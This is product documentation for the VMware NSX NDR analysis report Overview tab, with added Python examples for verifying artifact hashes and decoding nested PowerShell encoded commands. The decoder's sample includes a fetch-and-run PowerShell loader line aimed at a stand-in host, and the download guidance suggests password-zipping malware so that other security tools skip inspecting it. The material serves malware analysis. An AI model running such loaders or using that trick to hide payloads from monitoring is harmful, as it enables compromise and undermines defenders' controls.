Analysis report: Overview tab

The Overview tab displays the following information:

Click file download to download the detected file to your local machine. From the pull-down menu, select Download file or Download as ZIP.

If you select Download as ZIP, the Download file as a zip pop-up is displayed, prompting you to provide an optional password for the archive.

Important:

VMware NSX Network Detection and Response only allows you to download detected files under certain conditions.

If the artifact is considered low risk, file download is displayed and you can download it to your local machine.

If the artifact is considered risky, file download is not displayed unless your license has the ALLOW_RISKY_ARTIFACT_DOWNLOADS capability.

Be aware that the artifact can cause harm when opened.

The User Portal may display a pop-up: Warning: Downloading Malicious File. Click the I agree button to accept the conditions and download the file.

For malicious artifacts, encapsulate the file in a ZIP archive (the Download as ZIP option, ideally with a password) so that other security solutions monitoring your traffic or your endpoint do not automatically inspect, strip or quarantine the threat before you can examine it.

If you do not have the ALLOW_RISKY_ARTIFACT_DOWNLOADS capability and require the ability to download malicious artifacts, contact VMware Support.

Click plus / minus to expand/collapse the sections on the tab.

Analysis overview section

If the VMware backend encountered errors during analysis, a highlighted block listing the errors encountered is displayed.

The Analysis overview section provides a summary of the results of the analysis of a file or URL by the VMware backend. It displays the following data:

  • MD5 hash. Click search to search for other instances of this artifact in your network. Click Intelligence pages icon to view the artifact in Intelligence pages.

  • SHA1 hash. Click Intelligence pages icon to view the artifact in Intelligence pages.

  • SHA256 hash. Click Intelligence pages icon to view the artifact in Intelligence pages.

  • MIME type.

  • Submission timestamp.
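The download options and the hash fields above are two sides of one check a practitioner should make: after downloading a detected file, confirm that what landed on disk is the artifact the report describes before opening it anywhere. The following Python script is an added example and is not part of the product or this documentation; the function names, the assumption that a "Download as ZIP" archive holds exactly one member, and the sample file it hashes are the example's own.

```python
import hashlib
import os
import tempfile
import zipfile

CHUNK_SIZE = 1 << 20  # read 1 MiB at a time so large artifacts are not loaded into memory


def digest_stream(fh):
    """Compute the MD5, SHA1 and SHA256 digests of a file-like object in a single pass."""
    hashes = {name: hashlib.new(name) for name in ("md5", "sha1", "sha256")}
    for chunk in iter(lambda: fh.read(CHUNK_SIZE), b""):
        for h in hashes.values():
            h.update(chunk)
    return {name: h.hexdigest() for name, h in hashes.items()}


def digest_download(path, zipped=False, pwd=None):
    """Hash a downloaded artifact.

    With zipped=True the file is treated as the archive produced by "Download as ZIP"
    and the single member inside it is hashed (pwd is the password chosen at download
    time, as bytes). The container is deliberately not auto-detected: Office documents,
    JARs and other ZIP-based formats are themselves valid ZIP files and must be hashed
    as-is, otherwise a malicious .docx would be silently unpacked and mis-hashed.
    """
    if not zipped:
        with open(path, "rb") as fh:
            return digest_stream(fh)
    with zipfile.ZipFile(path) as zf:
        members = [m for m in zf.infolist() if not m.is_dir()]
        if len(members) != 1:
            raise ValueError("expected exactly one artifact in the archive, found %d" % len(members))
        with zf.open(members[0], pwd=pwd) as fh:
            return digest_stream(fh)


def verify_against_report(path, report_hashes, zipped=False, pwd=None):
    """Compare a download with the hashes shown in the Analysis overview section.

    report_hashes maps "md5", "sha1" and/or "sha256" (any case) to the hex string copied
    from the report (any case). Returns {algorithm: True/False} for each one supplied.
    """
    actual = digest_download(path, zipped=zipped, pwd=pwd)
    return {
        algo.lower(): actual[algo.lower()] == value.strip().lower()
        for algo, value in report_hashes.items()
        if algo.lower() in actual
    }


def build_sample():
    """Constructed sample, not a real detection: a small file written to a temporary
    directory, plus the same file wrapped in a ZIP to mirror the two download options.
    Returns (plain_path, zip_path)."""
    workdir = tempfile.mkdtemp(prefix="nsx-artifact-")
    plain = os.path.join(workdir, "artifact.bin")
    with open(plain, "wb") as fh:
        fh.write(b"hello")
    zipped = os.path.join(workdir, "artifact.zip")
    with zipfile.ZipFile(zipped, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.write(plain, "artifact.bin")
    return plain, zipped


if __name__ == "__main__":
    plain_path, zip_path = build_sample()
    # Hashes as they would be copied from the report for this constructed sample.
    report = {
        "MD5": "5d41402abc4b2a76b9719d911017c592",
        "SHA1": "aaf4c61ddcc5e8a2dabede0f3b482cd9aea9434d",
        "SHA256": "2cf24dba5fb0a30e26e83b2ac5b9e29e1b161e5c1fa7425e73043362938b9824",
    }
    print(verify_against_report(plain_path, report))
    print(verify_against_report(zip_path, report, zipped=True))
```

Compare SHA256 in preference to MD5 when only one value is checked: the MD5 field is there for searching and pivoting, and a mismatch on any algorithm means you are not holding the analysed artifact. A plain-text download is hashed as a whole; only pass zipped=True for archives the portal produced.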

Threat level section

The Threat level section starts with a summary of the analysis findings: "The file <MD5 hash> was found to be malicious" or "... benign".

It then displays the following data:

Risk assessment

This section displays the risk assessment findings.

  • Maliciousness score A score from 0 to 100.

  • Risk estimate An estimate of the risk posed by this artifact:

    • High This artifact represents a critical risk and must be addressed as a priority. Such subjects are typically Trojan files or documents containing exploits, leading to major compromises of the infected system. The risks are multiple, from information leakage to system malfunction, and can be partially inferred from the Type of activity detected. The score threshold for this category is usually above 70.

    • Medium This artifact can represent a long-term risk and needs to be monitored closely. Such subjects can be a web page containing suspicious content, potentially leading to drive-by download attempts. They can also be adware or fake antivirus products that do not pose an immediate serious threat but can cause issues with the functioning of the system. The score threshold for this category is usually from 30 to 70.

    • Low This artifact is considered benign and can be ignored. The score threshold for this category is usually below 30.

  • Antivirus class Click search to search for other instances of this class. Click Intelligence pages icon to view this class in Intelligence pages.

  • Antivirus family Click search to search for other instances of this family. Click Intelligence pages icon to view this family in Intelligence pages.

Analysis overview

The analysis overview list is sorted by severity and includes the following fields:

  • Severity This is a score between 0 and 100 of the maliciousness of the activities detected during analysis of the artifact. Additional icons indicate the operating systems that can run the artifact.

  • Type The types of activities detected during analysis of the artifact. These include:

    • Autostart Ability to start again automatically after the machine is shut down and restarted.

    • Disable Ability to disable critical components of the system.

    • Evasion Ability to evade analysis environment.

    • File Suspicious activity over the file system.

    • Memory Suspicious activity within the system memory.

    • Network Suspicious activity at the network level.

    • Reputation Known source, or signed by a reputable organization.

    • Settings Ability to permanently alter critical system settings.

    • Signature The subject was identified as malicious by a signature.

    • Steal Ability to access and potentially leak sensitive information.

    • Stealth Ability to remain unnoticed by users.

    • Silenced The subject was identified as benign.

  • Description A description corresponding to each type of activity detected during analysis of the artifact.

  • ATT&CK Tactic(s) The MITRE ATT&CK stage or stages of an attack. Multiple tactics are comma separated.

  • ATT&CK Technique(s) The observed actions or tools a malicious actor might utilize. Multiple techniques are comma separated.

  • Links Click search to search for other instances of this activity. Click Intelligence pages icon to view this activity in Intelligence pages.

Additional artifacts

This section lists additional artifacts (files and URLs) that were observed during the analysis of the submitted sample and that were in turn submitted for in-depth analysis. The list includes the following fields:

  • Description Describes the additional artifact.

  • SHA1 The SHA1 hash of the additional artifact.

  • Content type The MIME type of the additional artifact.

  • Score The maliciousness score of the additional artifact. Click link to view the associated analysis report.

Decoded command line arguments

If any PowerShell scripts were executed during the analysis, the system decodes them and displays their command-line arguments in a more human-readable form.
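As an illustration of what this decoding step involves, the following Python script (an added example, not code from the product or from this page) reverses the -EncodedCommand argument that PowerShell loaders commonly use: base64 over UTF-16LE text, often nested several layers deep. The function names, the handling of prefix abbreviations of the parameter name, and the constructed two-stage command line are the example's own assumptions.

```python
import base64
import binascii
import re

# Tokens of a Windows command line: double- or single-quoted strings, else runs of non-space.
_TOKEN = re.compile(r'"[^"]*"|\'[^\']*\'|\S+')
_FLAG = re.compile(r"^-([A-Za-z]+)$")


def is_encoded_flag(token):
    """True for -EncodedCommand and the abbreviations seen in the wild for it
    (-e, -ec, -enc, ...), i.e. any non-empty prefix of the parameter name, case-insensitive.
    Assumption: powershell.exe resolves such prefixes to -EncodedCommand."""
    m = _FLAG.match(token)
    return bool(m) and "encodedcommand".startswith(m.group(1).lower())


def decode_encoded_command(value):
    """Turn one -EncodedCommand value (base64 of UTF-16LE text) back into the script text.
    Raises binascii.Error or UnicodeDecodeError when the value is not a valid payload."""
    blob = value.strip().strip("\"'")
    blob += "=" * (-len(blob) % 4)  # tolerate padding stripped by logging or copy/paste
    raw = base64.b64decode(blob, validate=True)
    return raw.decode("utf-16-le")


def extract_encoded_commands(cmdline):
    """Return the decoded script for every -EncodedCommand in cmdline, outermost first.
    When a decoded script itself launches powershell with another encoded command,
    that layer is decoded too, so staged loaders unwrap completely."""
    scripts = []
    tokens = _TOKEN.findall(cmdline)
    for flag, value in zip(tokens, tokens[1:]):
        if not is_encoded_flag(flag):
            continue
        try:
            script = decode_encoded_command(value)
        except (binascii.Error, UnicodeDecodeError):
            continue  # flag present but the value is not a decodable payload
        scripts.append(script)
        scripts.extend(extract_encoded_commands(script))
    return scripts


def encode_command(script):
    """Inverse of decode_encoded_command; used here only to build the constructed sample."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample (not a real detection): a two-stage loader where the outer encoded
# command runs a second, also encoded, PowerShell that fetches a script from a reserved
# example domain.
SAMPLE_INNER = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/stage2.ps1")'
SAMPLE_OUTER = "powershell.exe -NoP -W Hidden -enc " + encode_command(SAMPLE_INNER)
SAMPLE_CMDLINE = "powershell.exe -ExecutionPolicy Bypass -EncodedCommand " + encode_command(SAMPLE_OUTER)


if __name__ == "__main__":
    for depth, script in enumerate(extract_encoded_commands(SAMPLE_CMDLINE)):
        print("layer %d: %s" % (depth, script))
```

The report already shows the decoded form; the same routine is useful when you meet the artifact again somewhere that only records the raw command line (an EDR process event, a Sysmon log) and want to confirm it is the same loader before pivoting on the hash.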

Third-party tools

A link to a report on the artifact on VirusTotal.

Intelligence information

The Intelligence information section extracts relevant data from the Knowledge Base and provides further details about the sample.

Important:

This section does not appear if you do not have a Knowledge Base license.

Some of this information helps you determine whether a given threat has been seen broadly at other VMware customers or targets specific market sectors. Other information displays the timeline of occurrences when the sample was observed at other VMware customer sites. This information can help you understand whether the sample belongs to a well-known threat or represents a new one.